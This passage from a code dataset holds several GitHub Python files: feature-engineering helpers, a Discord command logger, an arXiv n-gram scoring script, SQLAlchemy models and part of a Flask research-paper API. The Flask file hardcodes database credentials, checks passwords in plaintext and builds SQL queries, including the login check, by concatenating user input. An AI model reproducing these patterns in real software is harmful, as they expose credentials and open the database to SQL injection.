np.array(col).reshape(len(col),1)\n # print('max_min : -----', col)\n max = np.max(col)\n min = np.min(col)\n # feature_normalization_dict[str(col_op)] = (max,min)\n\n # new_col = np.apply_along_axis(lambda x :float((x - min) / (max - min)),axis=1,arr=col)\n new_col = [float((x - min) / (max - min)) if (max - min)!=0 else 0 for x in col ]\n\n return np.array(new_col).reshape(len(new_col))\n\n\n\ndef add(col1,col2):\n '''\n :type col1,col2: list or np.array\n :rtype: np.array,shape = (len(array),1)\n '''\n #\n try:\n col1 = np.array(col1)\n col2 = np.array(col2)\n return (col1 + col2).reshape(len(col1),1)\n except:\n raise ValueError('Value type error,check feature type')\n\ndef multiply(col1, col2):\n '''\n :type col1,col2: list or np.array\n :rtype: np.array,shape = (len(array),1)\n '''\n #\n try:\n col1 = np.array(col1)\n col2 = np.array(col2)\n return (col1 * col2).reshape(len(col1),1)\n except:\n raise ValueError('Value type error,check feature type')\n\ndef subtract(col1, col2):\n '''\n :type col1,col2: list or np.array\n :rtype: np.array,shape = (len(array),2)\n '''\n #\n try:\n col1 = np.array(col1).reshape(len(col1),1)\n col2 = np.array(col2).reshape(len(col2),1)\n return np.concatenate((col1 - col2,col2 - col1),axis = 1)\n except:\n raise ValueError('Value type error,check feature type')\n\ndef divide_old(col1,col2):\n '''\n :type col1,col2: list or np.array\n :rtype: np.array,shape = (len(array),2)\n '''\n try:\n col1 = np.array(col1)\n col2 = np.array(col2)\n replace_col1 = np.array([float(np.where(x == 0., random.choice([1e-5,-1e-5]), x)) for x in col1])\n replace_col2 = np.array([float(np.where(x == 0., random.choice([1e-5,-1e-5]), x)) for x in col2])\n col_d1,col_d2 = replace_col1/replace_col2,replace_col2/replace_col1\n col_d1 = replace_abnormal(col_d1)\n col_d2 = replace_abnormal(col_d2)\n return np.concatenate((col_d1,col_d2),axis = 1)\n except:\n raise ValueError('Value type error,check feature type')\n\n\ndef divide(col1,col2):\n '''\n :type col1,col2: list or np.array\n :rtype: np.array,shape = (len(array),2)\n '''\n try:\n col1 = np.array(col1)\n col2 = np.array(col2)\n col_d1 = np.array([col1[idx]/col2[idx] if col2[idx]!=0 else 0 for idx in range(len(col1))])\n col_d2 = np.array([col2[idx]/col1[idx] if col1[idx]!=0 else 0 for idx in range(len(col1))]) \n col_d1 = replace_abnormal(col_d1)\n col_d2 = replace_abnormal(col_d2)\n col_d1 = col_d1.reshape(len(col_d1),1)\n col_d2 = col_d2.reshape(len(col_d2),1)\n return np.concatenate((col_d1,col_d2),axis = 1)\n except:\n raise ValueError('Value type error,check feature type')\n\ndef onehot_encoder(ori_fe):\n '''\n\n '''\n ori_fe = np.array(ori_fe).reshape(len(ori_fe),1)\n encoder = OneHotEncoder()\n enc = encoder.fit(ori_fe)\n onehot_fe = enc.transform(ori_fe).toarray()\n return onehot_fe\n\n# 分箱操作\ndef merge(ori_fe,bins,fe_name = None):\n ''''''\n ori_fe = np.array(ori_fe)\n\n\n\n\"\"\"\n\n\"\"\"\n\ndef binning(ori_fe,bins,fe_name = None,method = 'frequency'):\n '''\n\n '''\n ori_fe = np.array(ori_fe)\n\n # k = bins - 1\n if method == 'frequency':\n\n fre_list = [np.percentile(ori_fe, 100 / bins * i) for i in range(1,bins)]\n fre_list = sorted(list(set(fre_list)))\n\n new_fe = np.array([ff(x,fre_list) for x in ori_fe])\n new_fe_encode = onehot_encoder(new_fe)\n return new_fe.reshape(len(new_fe),1),fre_list,new_fe_encode\n # Equidistant box division\n elif method == 'distance':\n umax = np.percentile(ori_fe, 99.99)\n umin = np.percentile(ori_fe, 0.01)\n step = (umax - umin) / bins\n fre_list = [umin + i * step for i in range(bins)]\n\n new_fe = np.array([ff(x,fre_list) for x in ori_fe])\n new_fe_encode = onehot_encoder(new_fe)\n return new_fe.reshape(len(new_fe), 1),fre_list,new_fe_encode\n\ndef reset_value(ori_fe,c, merged_values, k):\n for merged_value in merged_values:\n indexs = np.argwhere(ori_fe == merged_value).reshape(-1)\n # Modify and search the low frequency value of the original A\n new_value = k + c # This basically ensures that the original value will not be repeated\n ori_fe[indexs] = new_value\n\n\ndef recur_merge_regression(bins, frequency_list, value_types, residual_f , ori_fe):\n # Recursively merge the frequency probability variables, where the default variable frequencies have been sorted\n # Version for regression problems\n k = len(ori_fe)\n if bins == 1:\n merged_values = value_types\n reset_value(ori_fe,len(value_types),merged_values, k)\n return\n target_frequency = residual_f / bins\n merged_f,merged_values,ptr = 0,[],0\n for i,f in enumerate(frequency_list):\n residual_f -= f\n ptr = i + 1\n if f < target_frequency:\n merged_f += f\n merged_values.append(value_types[i])\n if merged_f >= target_frequency:\n bins -= 1\n break\n else:\n bins -= 1\n break\n reset_value(ori_fe,len(value_types), merged_values, k)\n frequency_list,value_types = frequency_list[ptr:],value_types[ptr:]\n\n recur_merge_regression(bins,frequency_list,value_types,residual_f, ori_fe)\n\n\n\ndef recur_merge_classify(chi2_dict,bins,ori_fe):\n\n\n def merge_value_type(chi2_value_tuple, chi2_dict, c):\n chi2_1, chi2_2 = chi2_value_tuple\n if chi2_1 == chi2_2:\n index1 = list(chi2_dict.values()).index(chi2_1)\n index2 = index1 + 1\n else:\n index1 = list(chi2_dict.values()).index(chi2_1)\n index2 = list(chi2_dict.values()).index(chi2_2)\n value_type_of_chi2_1 = list(chi2_dict.keys())[index1]\n value_type_of_chi2_2 = list(chi2_dict.keys())[index2]\n new_chi2_value = chi2_1 + chi2_2\n k = len(ori_fe) + value_type_of_chi2_2 + value_type_of_chi2_1\n merged_values = [value_type_of_chi2_1, value_type_of_chi2_2]\n reset_value(ori_fe, c, merged_values, k)\n new_value_type = k + c\n chi2_dict[new_value_type] = new_chi2_value\n del chi2_dict[value_type_of_chi2_1]\n del chi2_dict[value_type_of_chi2_2]\n chi2_dict = dict(sorted(chi2_dict.items(), key=lambda x: x[1], reverse=True))\n return chi2_dict\n\n c = len(np.unique(ori_fe))\n while c > bins:\n chi2_value_list = np.array(list(chi2_dict.values()))\n chi2_value_tuple = (chi2_value_list[-1],chi2_value_list[-2])\n chi2_dict = merge_value_type(chi2_value_tuple,chi2_dict,c)\n c = len(list(chi2_dict.values()))\n\n\ndef binning_for_discrete(ori_fe, bins, mode, label,fe_name = None):\n\n\n ori_fe = categories_to_int(ori_fe)\n unique_value = list(set(list(ori_fe)))\n k = len(unique_value)\n if k <= bins:\n return np.array(ori_fe).reshape(-1,1)\n\n if mode == 'regression':\n n = len(ori_fe)\n # 1.First calculate the frequency of each classification variable\n frequency = dict(Counter(ori_fe))\n sorted_frequency = dict(sorted(frequency.items(),key = lambda x:x[1], reverse = True))\n for key in sorted_frequency.keys():\n sorted_frequency[key] /= n\n frequency_list = list(sorted_frequency.values())\n value_types = list(sorted_frequency.keys())\n recur_merge_regression(bins,frequency_list,value_types,residual_f=1.0,ori_fe = ori_fe)\n\n else:\n\n sorted_chi2_dict = calculate_chi2(ori_fe,label)\n recur_merge_classify(sorted_chi2_dict,bins,ori_fe)\n ori_fe = categories_to_int(ori_fe)\n return ori_fe.reshape(len(ori_fe))\n\ndef cal_woe_iv(X,y,bins):\n '''\n '''\n if len(X) != len(y):\n raise KeyError('Feature length not equal to target length')\n bins_x,bond_list,encode_x = binning(X,bins)\n del encode_x #\n gc.collect()\n bins_x = np.array([x[0] for x in bins_x])\n bins_unique = np.unique(bins_x)\n y_positive_sum,y_negtive_sum = sum(y),len(y) - sum(y)\n\n bins_positive_negtive_dic = {}\n for bin_unique in bins_unique:\n bins_positive_negtive_dic[bin_unique] = [0,0] #\n for bin_x,t in zip(bins_x,y):\n if not t:\n bins_positive_negtive_dic[bin_x][1] += 1\n else:\n bins_positive_negtive_dic[bin_x][0] += 1\n # woe = np.log((yi/yt)/(ni/nt))\n woe,iv = [],[]\n for bin_x in bins_x:\n yi,ni = bins_positive_negtive_dic[bin_x]\n woe_i = np.log((yi/y_positive_sum)/(ni/y_negtive_sum))\n iv_i = ((yi/y_positive_sum) - (ni/y_negtive_sum)) * woe_i\n woe.append(woe_i)\n iv.append(iv_i)\n return np.array(woe).reshape(len(woe),1), iv\n\n\n\n\ndef col_names_maping(col_names,ori_cols,combine_features_name_list):\n '''\n '''\n hash_map = {}\n for i,col_name in enumerate(col_names):\n if col_name not in hash_map:\n hash_map[col_name] = i\n else:\n raise ValueError('Duplicate col_name in original features')\n selected_cols = []\n for feature_name in combine_features_name_list:\n selected_cols.append(hash_map[feature_name])\n extracted_features = ori_cols[:,selected_cols]\n return extracted_features\n\n\ndef combine_onehot(ori_fes,fe_names):\n\n col_unique_list = []\n col_unique_dict = {}\n for i,name in enumerate(fe_names):\n unique_value = np.unique(ori_fes[:,i])\n unique_dict = {value:str(idx) for idx,value in enumerate(unique_value)}\n col_unique_dict[name] = unique_dict\n col_unique_list.append(list(unique_dict.values()))\n from itertools import product\n composite_idx = list(product(*col_unique_list))\n composite_str = [''.join(list(tp)) for tp in composite_idx] # Unique combination['00', '01', '10', '11']\n zero_array = np.zeros(shape=(len(ori_fes) , len(composite_str) + 1))\n new_col_composite_str = [[str(int(imp)) for imp in row] for row in ori_fes]\n new_col_composite_str = [''.join(lt) for lt in new_col_composite_str]\n \n for row,cp_str in enumerate(new_col_composite_str):\n if cp_str in composite_str:\n col = composite_str.index(cp_str)\n zero_array[row,col] = 1\n else:\n zero_array[row,-1] = 1\n # print(fe_names , zero_array.shape)\n return zero_array\n \n\ndef check_is_continuous(ori_fes,fe_names,continuous_columns,continuous_bins):\n for idx,name in enumerate(fe_names):\n if name in continuous_columns:\n bins = continuous_bins[name]\n if len(np.unique(ori_fes[:,idx])) < bins:\n raise ValueError(f'{name} unique value is {len(np.unique(ori_fes[:,idx]))} , but bins {bins}')\n fes_bins,_,_ = binning(ori_fes[:,idx],bins,fe_name = name,method = 'frequency')\n # print(fes_bins)\n # print(fes_bins.reshape(len(fes_bins),1))\n ori_fes[:,idx] = fes_bins.reshape(len(fes_bins))\n return ori_fes\n\ndef combine_noonehot(ori_fes,fe_names):\n #\n col_unique_list = []\n col_unique_dict = {}\n for i,name in enumerate(fe_names):\n unique_value = np.unique(ori_fes[:,i])\n unique_dict = {value:str(idx) for idx,value in enumerate(unique_value)}\n col_unique_dict[name] = unique_dict\n col_unique_list.append(list(unique_dict.values()))\n from itertools import product\n composite_idx = list(product(*col_unique_list))\n composite_str = [''.join(list(tp)) for tp in composite_idx] # 唯一组合['00', '01', '10', '11']\n new_col_composite_str = [[str(int(imp)) for imp in row] for row in ori_fes]\n new_col_composite_str = [''.join(lt) for lt in new_col_composite_str]\n combine_col = np.array([composite_str.index(cp_str) for cp_str in new_col_composite_str])\n \n return combine_col.reshape(-1,1)\n\n\n","repo_name":"Grason-Lu/Catch","sub_path":"feature_engineering/feature_generate.py","file_name":"feature_generate.py","file_ext":"py","file_size_in_byte":15559,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"42346871274","text":"from core import Invocation, is_user_opted_out_of_data_processing\nimport datetime as dt\nfrom somsiad import Somsiad, SomsiadMixin\n\nimport psycopg2\nfrom discord.ext import commands\n\nimport data\nfrom utilities import text_snippet, utc_to_naive_local\n\n\nclass Commands(commands.Cog, SomsiadMixin):\n @commands.Cog.listener()\n async def on_command(self, ctx: commands.Context):\n with data.session(commit=True) as session:\n if not ctx.command or is_user_opted_out_of_data_processing(session, ctx.author.id):\n return\n invocation = Invocation(\n message_id=ctx.message.id,\n server_id=ctx.guild.id if ctx.guild is not None else None,\n channel_id=ctx.channel.id,\n user_id=ctx.author.id,\n prefix=ctx.prefix,\n full_command=ctx.command.qualified_name,\n root_command=str(ctx.command.root_parent or ctx.command.qualified_name),\n created_at=utc_to_naive_local(ctx.message.created_at),\n )\n session.add(invocation)\n\n @commands.Cog.listener()\n async def on_command_completion(self, ctx: commands.Context):\n with data.session(commit=True) as session:\n if is_user_opted_out_of_data_processing(session, ctx.author.id):\n return\n invocation = session.query(Invocation).get(ctx.message.id)\n invocation.exited_at = dt.datetime.now()\n\n @commands.Cog.listener()\n async def on_command_error(self, ctx: commands.Context, error: commands.CommandError):\n with data.session(commit=True) as session:\n if is_user_opted_out_of_data_processing(session, ctx.author.id):\n return\n invocation = session.query(Invocation).get(ctx.message.id)\n if invocation is not None:\n invocation.exited_at = dt.datetime.now()\n invocation.error = text_snippet(\n str(error).replace('Command raised an exception: ', ''), Invocation.MAX_ERROR_LENGTH\n )\n\n\nasync def setup(bot: Somsiad):\n await bot.add_cog(Commands(bot))\n","repo_name":"Twixes/somsiad","sub_path":"plugins/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"37"} +{"seq_id":"23977100617","text":"import os\nimport json\nimport pickle\nimport argparse\nimport string\nfrom tqdm import tqdm\nfrom datetime import date\nimport numpy as np\nfrom time import time\n\nfrom combine_meme_files import get_combined_metadata\n\nSCRATCH_PATH = '/scratch/datasets/aw588/'\nUNARXIVE_PATH = SCRATCH_PATH + \"unarXive\"\nCACHE_PATH = '/scratch/datasets/mog29/unarXive'\nVALID_DISCIPLINES = [\"cs.AI\", \"cs.CL\", \"cs.CV\", \"cs.LG\", \"stat.ML\"]\nINTRO_SUBSTRING = 'introduction'\nRW_SUBSTRING = 'related'\nMETHOD_SUBSTRINGS = ['method', 'model', 'approach']\nIDF_THRESHOLD = 1.6\n\n\ndef compute_overall_frequencies(year_to_frequencies, paper_to_metadata, disciplines):\n max_year = max(list(year_to_frequencies.keys()))\n\n for paper, metadata in tqdm(paper_to_metadata.items()):\n categories = metadata['categories']\n found_match = any([cat in disciplines for cat in categories])\n if not found_match:\n continue\n\n year = int(metadata['release_date'][-1])\n for curr_year in range(year, max_year + 1): \n year_to_frequencies[curr_year]['num_papers'] += 1\n\ndef get_combined_n_grams(years):\n new_years = [str(year)[2:] for year in years]\n\n # Iterate over all years\n all_paper_ids = set()\n meme_to_articles = {}\n for year in tqdm(new_years):\n year_meme_path = os.path.join(CACHE_PATH, f'n_gram_to_papers_{year}.pkl')\n with open(year_meme_path, 'rb') as f:\n year_memes = pickle.load(f)\n\n for meme, containing_docs in year_memes.items():\n if meme not in meme_to_articles:\n meme_to_articles[meme] = set()\n for containing_doc in containing_docs:\n meme_to_articles[meme].add(containing_doc)\n all_paper_ids.add(containing_doc)\n\n return meme_to_articles\n\n\ndef is_meme_in_paper(paper, meme, meme_to_articles):\n if meme not in meme_to_articles:\n return False\n return paper in meme_to_articles[meme]\n\ndef is_meme_in_citations(citations, meme, meme_to_articles):\n truth_vals = []\n for paper in citations:\n truth_vals.append(is_meme_in_paper(paper, meme, meme_to_articles))\n return any(truth_vals)\n\ndef compute_n_gram_meme_score_terms(year, meme_to_articles, common_memes, meme_to_score_components,\n paper_to_metadata, disciplines):\n for paper, metadata in tqdm(paper_to_metadata.items()):\n # Skip paper if out of discipline\n categories = metadata['categories']\n found_match = any([cat in disciplines for cat in categories])\n if not found_match:\n continue\n\n # Skip paper if published after year\n paper_year = int(metadata[\"release_date\"][-1])\n if paper_year > year:\n continue\n citations = metadata['cited_papers']\n\n # Iterate over each meme\n for meme in common_memes:\n meme_in_paper = is_meme_in_paper(paper, meme, meme_to_articles)\n meme_in_citations = is_meme_in_citations(citations, meme, meme_to_articles) \n\n if meme_in_paper:\n meme_to_score_components[meme]['frequency'] += 1\n if meme_in_citations:\n meme_to_score_components[meme]['in_paper_in_citations'] += 1\n meme_to_score_components[meme]['in_citations'] += 1\n else:\n meme_to_score_components[meme]['in_paper_not_in_citations'] += 1\n meme_to_score_components[meme]['not_in_citations'] += 1\n else:\n if meme_in_citations:\n meme_to_score_components[meme]['in_citations'] += 1\n else:\n meme_to_score_components[meme]['not_in_citations'] += 1 \n \ndef save_year_discipline_meme_scores(year_to_frequencies, meme_to_score_components, year, discipline_suffix):\n meme_to_scores = {}\n for meme, score_components in meme_to_score_components.items():\n # Compute the frequency score\n total_frequency = year_to_frequencies[year]['num_papers']\n meme_frequency = score_components['frequency']\n frequency_score = meme_frequency / (total_frequency + 1e-8)\n\n # Compute sticking scores\n in_paper_in_citations = score_components['in_paper_in_citations']\n in_citations = score_components['in_citations']\n sticking_score = in_paper_in_citations / (3 + in_citations)\n \n # Compute sparking scores\n in_paper_not_in_citations = score_components['in_paper_not_in_citations']\n not_in_citations = score_components['not_in_citations']\n sparking_score = (3+in_paper_not_in_citations) / (3 + not_in_citations)\n\n # Compute meme scores\n meme_score = frequency_score * sticking_score / sparking_score\n meme_to_scores[meme] = {\"meme_score\" : meme_score}\n\n meme_score_path = os.path.join(CACHE_PATH, f'year_{year}_meme_scores_{discipline_suffix}.pkl')\n with open(meme_score_path, 'wb') as f:\n pickle.dump(meme_to_scores, f) \n\nif __name__ == \"__main__\":\n years = [i for i in range(1991, 2023)]\n\n paper_to_metadata = get_combined_metadata()\n meme_to_articles = get_combined_n_grams(years)\n\n # Compute the total number of publications per year\n all_disciplines = [\n VALID_DISCIPLINES,\n ['astro-ph.CO', 'astro-ph.EP', 'astro-ph.GA', 'astro-ph.HE', 'astro-ph.IM', 'astro-ph.SR'],\n ['cond-mat.dis-nn', 'cond-mat.mes-hall', 'cond-mat.mtrl-sci', 'cond-mat.other',\n 'cond-mat.quant-gas', 'cond-mat.soft', 'cond-mat.stat-mech', 'cond-mat.str-el',\n 'cond-mat.supr-con'],\n ['hep-ex', 'hep-lat', 'hep-ph', 'hep-th'],\n ['nlin.AO', 'nlin.CD', 'nlin.CG', 'nlin.PS', 'nlin.SI'],\n ['nucl-ex', 'nucl-th']]\n discipline_suffixes = [\n 'ai',\n 'astrophysics',\n 'condensed_matter',\n 'high_energy',\n 'nonlinear',\n 'nuclear']\n\n # Iterate over each year/discipline pair\n for i in range(len(all_disciplines)):\n discipline = all_disciplines[i]\n discipline_suffix = discipline_suffixes[i]\n print(discipline, discipline_suffix)\n\n year_to_frequencies = {year : {'num_papers' : 0} for year in years} \n compute_overall_frequencies(year_to_frequencies, paper_to_metadata, discipline)\n\n for year in years:\n print(year)\n\n # Load most common memes for that pairing\n common_meme_savepath = os.path.join(CACHE_PATH, f'year_{year}_most_common_{discipline_suffix}.pkl')\n with open(common_meme_savepath, 'rb') as f:\n common_memes = pickle.load(f)[:2500]\n\n meme_to_score_components = {meme : {\n 'frequency' : 0,\n 'in_paper_in_citations' : 0,\n 'in_citations' : 0,\n 'in_paper_not_in_citations' : 0,\n 'not_in_citations' : 0\n } for meme in common_memes}\n compute_n_gram_meme_score_terms(year, meme_to_articles, common_memes, meme_to_score_components,\n paper_to_metadata, discipline)\n save_year_discipline_meme_scores(year_to_frequencies, meme_to_score_components, year, discipline_suffix)\n \n\n","repo_name":"annshin/2023sp_cs6850_network","sub_path":"research_trends/compute_meme_scores.py","file_name":"compute_meme_scores.py","file_ext":"py","file_size_in_byte":7270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42555313933","text":"from sqlalchemy import Boolean, Column, ForeignKey, Integer, String\nfrom sqlalchemy.orm import relationship\n\nfrom database import Base\n\n\nclass ProspectStatement(Base):\n __tablename__ = \"prospect_statement\"\n\n statement_id = Column(Integer, primary_key=True, index=True)\n org_id = Column(Integer)\n prospect_statement = Column(String)\n statement_type = Column(String)\n\nclass ProspectResponse(Base):\n __tablename__ = \"prospect_response\"\n\n response_id = Column(Integer, primary_key=True, index=True)\n statement_id = Column(Integer,ForeignKey(\"prospect_statement.statement_id\"))\n response = Column(String)\n\nclass RepsQuestion(Base):\n __tablename__ = 'reps_question'\n\n org_id = Column(Integer)\n question_id = Column(Integer, primary_key=True, index=True)\n call_type = Column(String)\n question = Column(String)\n","repo_name":"ASWANTH-J/gembrill-fastapi-backend","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18538770660","text":"#!flask/bin/python\n\n\"\"\"Alternative version of the ToDo RESTful server implemented using the\nFlask-RESTful extension.\"\"\"\n\nfrom flask import Flask, jsonify, abort, make_response, g\nfrom flask_restful import Api, Resource, reqparse, fields, marshal\nfrom flask_httpauth import HTTPBasicAuth\nfrom flask_cors import CORS, cross_origin\n\nimport pymysql\n#from pymysqlpool.pool import Pool\n\nfrom datetime import datetime\n\nfrom itsdangerous import (TimedJSONWebSignatureSerializer\n as Serializer, BadSignature, SignatureExpired)\n\napp = Flask(__name__, static_url_path=\"\")\napp.config['SECRET_KEY'] = 'Snu2019!'\ncors = CORS(app, resources={r\"/api/*\": {\"origins\": \"*\"}})\napi = Api(app)\nauth = HTTPBasicAuth()\n\nhost = \"147.47.206.14\"\nport = 3306\nuser = \"user1\"\npassword = \"Snu2019!\"\ndb = \"research_db\"\nconfig={'host':host, 'port':port, 'user':user, 'password':password, 'database':db, 'autocommit':True}\n#pool = Pool(host=host, port=port, user=user, password=password, db=db, autocommit=True)\n#pool.init()\n\nclass Database:\n def __init__(self):\n self.con = pymysql.connect(host=host, port=port, user=user, password=password, db=db)\n #self.con = pool.get_conn()\n self.cur = self.con.cursor(pymysql.cursors.DictCursor)\n\n def close(self):\n self.cur.close()\n self.con.close()\n #pool.release(self.con) \n\n def list_researchers(self):\n self.cur.execute(\"SELECT id, username, fullname, affiliation FROM researcher\")\n result = self.cur.fetchall()\n self.close()\n return result\n\n def get_researcher(self, id):\n self.cur.execute(\"SELECT id, username, fullname, affiliation FROM researcher WHERE id = %s\", id)\n results = self.cur.fetchall()\n self.close()\n if results and len(results) > 0:\n return results[0]\n return None\n\n def list_confs(self):\n self.cur.execute(\"SELECT id, abbr, name, year, location, type, field, impact_factor, link, start_date, end_date, submit_date, notification_date FROM conference WHERE start_date IS NOT NULL ORDER BY start_date ASC\")\n results = self.cur.fetchall()\n self.close()\n return results\n\n def search_confs(self, search_key):\n search_key = search_key.lower()\n self.cur.execute(\"SELECT id, abbr, name, year, location, type, field, impact_factor, link FROM conference WHERE lower(abbr) LIKE %s OR lower(name) LIKE %s ORDER BY abbr\", (search_key, search_key))\n results = self.cur.fetchall()\n self.close()\n return results\n\n def list_papers(self, offsetStart, pageSize):\n self.cur.execute(\"SELECT a.id, title, authors, conference, year, a.affiliation, abstract, comments, read_by, read_date, research_id, c.name AS research_name, a.paper_keys, a.paper_link, b.fullname FROM paper a JOIN researcher b ON a.read_by = b.id LEFT JOIN research c ON a.research_id = c.id ORDER BY read_date DESC LIMIT %s, %s\", (offsetStart, pageSize))\n result = self.cur.fetchall()\n self.close()\n return result\n\n def list_papers_by_researcher(self, rid, offsetStart, pageSize):\n self.cur.execute(\"SELECT a.id, title, authors, conference, year, a.affiliation, abstract, comments, read_by, read_date, research_id, c.name AS research_name, a.paper_keys, a.paper_link, b.fullname FROM paper a JOIN researcher b ON a.read_by = b.id LEFT JOIN research c ON a.research_id = c.id WHERE read_by='\" + rid + \"' ORDER BY read_date DESC LIMIT %s, %s\", (offsetStart, pageSize))\n result = self.cur.fetchall()\n self.close()\n return result\n\n def list_papers_by_project(self, project_id, offsetStart, pageSize):\n self.cur.execute(\"SELECT a.id, title, authors, conference, year, a.affiliation, abstract, comments, read_by, read_date, research_id, c.name AS research_name, a.paper_keys, a.paper_link, b.fullname FROM paper a JOIN researcher b ON a.read_by = b.id JOIN research c ON a.research_id = c.id WHERE a.research_id=%s ORDER BY read_date DESC LIMIT %s, %s\", (str(project_id), offsetStart, pageSize))\n result = self.cur.fetchall()\n self.close()\n return result\n\n def get_paper(self, id):\n self.cur.execute(\"SELECT a.id, title, authors, conference, year, a.affiliation, abstract, comments, read_by, read_date, research_id, c.name AS research_name, a.paper_keys, a.paper_link, b.fullname FROM paper a JOIN researcher b ON a.read_by = b.id LEFT JOIN research c ON a.research_id = c.id WHERE a.id='\" + id + \"'\")\n result = self.cur.fetchall()\n self.close()\n return result\n\n def search_papers(self, search_key):\n search_key = search_key.lower()\n self.cur.execute(\"SELECT a.id, title, authors, conference, year, a.affiliation, abstract, comments, read_by, read_date, research_id, c.name AS research_name, a.paper_keys, a.paper_link, b.fullname FROM paper a JOIN researcher b ON a.read_by = b.id LEFT JOIN research c ON a.research_id = c.id WHERE lower(title) LIKE %s OR lower(authors) LIKE %s OR lower(conference) LIKE %s OR lower(b.fullname) LIKE %s ORDER BY read_date DESC\", (search_key, search_key, search_key, search_key))\n result = self.cur.fetchall()\n self.close()\n return result\n\n def get_comments(self, paper_id):\n self.cur.execute(\"SELECT a.id, a.paper_id, a.researcher_id, a.comment, a.contribution_date, b.fullname FROM paper_contribution a JOIN researcher b ON a.researcher_id = b.id WHERE a.paper_id = %s ORDER BY a.contribution_date DESC\", (paper_id))\n result = self.cur.fetchall()\n self.close()\n return result\n\n def insert_comment(self, paper_id, researcher_id, comment, contribution_date):\n self.cur.execute(\"INSERT INTO paper_contribution(paper_id, researcher_id, comment, contribution_date) VALUES(%s, %s, %s, %s)\", (paper_id, researcher_id, comment, contribution_date))\n self.con.commit()\n # get new created id\n self.cur.execute(\"SELECT MAX(id) AS id FROM paper_contribution\")\n result = self.cur.fetchall()\n self.close()\n return result[0]['id']\n\n def update_comment(self, comment_id, paper_id, researcher_id, comment, updated_date):\n self.cur.execute(\"UPDATE paper_contribution SET comment = %s, updated_date = %s WHERE id = %s AND paper_id = %s AND researcher_id = %s\", (comment, updated_date, comment_id, paper_id, researcher_id))\n self.con.commit()\n self.close()\n return comment_id\n\n def delete_comment(self, id, paper_id, researcher_id):\n num_row = self.cur.execute(\"DELETE FROM paper_contribution WHERE id = %s AND paper_id = %s AND researcher_id = %s\", (id, paper_id, researcher_id))\n self.con.commit()\n self.close()\n return num_row\n\n def check_login(self, username, password):\n print(username)\n if not username or not password:\n return None\n # select password from DB\n self.cur.execute(\"SELECT id, username, fullname, password FROM researcher WHERE username = '\" + username + \"'\")\n result = self.cur.fetchall()\n self.close()\n if result and len(result) > 0 and password == result[0][\"password\"]:\n return result[0]\n return None\n\n def getUser(self, id):\n self.cur.execute(\"SELECT id, username, fullname FROM researcher WHERE id = %s\", (id))\n results = self.cur.fetchall()\n self.close()\n if (results and len(results) > 0):\n return results[0]\n return None\n\n def insert_paper(self, title, authors, conference, year, affiliation, abstract, comments, read_by, read_date, research_id, keys, paper_link):\n self.cur.execute(\"INSERT INTO paper(title, authors, conference, year, affiliation, abstract, comments, read_by, read_date, research_id, paper_keys, paper_link) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\", (title, authors, conference, year, affiliation, abstract, comments, read_by, read_date, research_id, keys, paper_link))\n self.con.commit()\n # get new id\n self.cur.execute(\"SELECT MAX(id) AS id FROM paper\")\n result = self.cur.fetchall()\n self.close()\n if result and len(result) > 0:\n return result[0]['id']\n return 0\n\n def update_paper(self, id, user_id, title, authors, conference, year, affiliation, abstract, comments, read_by, read_date, research_id, keys, paper_link):\n num_row = self.cur.execute(\"UPDATE paper SET title=%s, authors=%s, conference=%s, year=%s, affiliation=%s, abstract=%s, comments=%s, read_by=%s, read_date=%s, research_id=%s, paper_keys=%s, paper_link=%s WHERE id=%s AND read_by=%s\", (title, authors, conference, year, affiliation, abstract, comments, read_by, read_date, research_id, keys, paper_link, id, user_id))\n self.con.commit()\n self.close()\n return num_row\n\n def delete_paper(self, id, user_id):\n num_row = self.cur.execute(\"DELETE FROM paper WHERE id = %s AND read_by = %s\", (id, user_id))\n self.con.commit()\n self.close()\n return num_row\n\n def get_research(self, id):\n self.cur.execute(\"SELECT id, name, goals, start_date, end_date_plan, end_date_actual, type FROM research WHERE id = %s\", (id))\n results = self.cur.fetchall()\n self.close()\n return results\n\n def list_research(self):\n self.cur.execute(\"SELECT id, name, goals, start_date, end_date_plan, end_date_actual, type, created_by FROM research ORDER BY type, start_date DESC\")\n results = self.cur.fetchall()\n self.close()\n return results\n\n def insert_research(self, name, goals, start_date, end_date_plan, created_by, type):\n self.cur.execute(\"INSERT INTO research(name, goals, start_date, end_date_plan, created_by, type) VALUES (%s, %s, %s, %s, %s, %s)\", (name, goals, start_date, end_date_plan, created_by, type))\n self.con.commit()\n # get new id\n self.cur.execute(\"SELECT MAX(id) AS id FROM research\")\n result = self.cur.fetchall()\n self.close()\n return result[0]['id']\n\n def update_research(self, id, name, goals, start_date, end_date_plan, created_by, type):\n self.cur.execute(\"UPDATE research SET name = %s, goals = %s, start_date = %s, end_date_plan = %s, created_by = %s, type = %s WHERE id = %s\", (name, goals, start_date, end_date_plan, created_by, type, id))\n self.con.commit()\n self.close()\n return id\n\n def delete_research(self, id, created_by):\n # check if research not use in other paper\n self.cur.execute(\"SELECT COUNT(1) AS count FROM paper WHERE research_id = %s\", (str(id)))\n result = self.cur.fetchall()\n if (result and result[0]['count'] > 0):\n return 0\n # delete\n num_row = self.cur.execute(\"DELETE FROM research WHERE id = %s AND created_by = %s\", (str(id), str(created_by)))\n self.con.commit()\n self.close()\n return num_row\n\n def get_experiments(self, research_id, researcher_id):\n self.cur.execute(\"SELECT a.id, a.research_id, a.researcher_id, a.start_date, a.end_date, a.goal, a.input, a.method, a.result FROM experiment a WHERE a.research_id = %s AND a.researcher_id = %s ORDER BY a.start_date DESC\", (research_id, researcher_id))\n result = self.cur.fetchall()\n self.close()\n return result\n\n def insert_experiment(self, research_id, researcher_id, start_date, end_date, goal, input, method, result):\n self.cur.execute(\"INSERT INTO experiment(research_id, researcher_id, start_date, end_date, goal, input, method, result) VALUES(%s, %s, %s, %s, %s, %s, %s, %s)\", (research_id, researcher_id, start_date, end_date, goal, input, method, result))\n self.con.commit()\n # get new created id\n self.cur.execute(\"SELECT MAX(id) AS id FROM experiment\")\n result = self.cur.fetchall()\n self.close()\n return result[0]['id']\n\n def update_experiment(self, id, research_id, researcher_id, 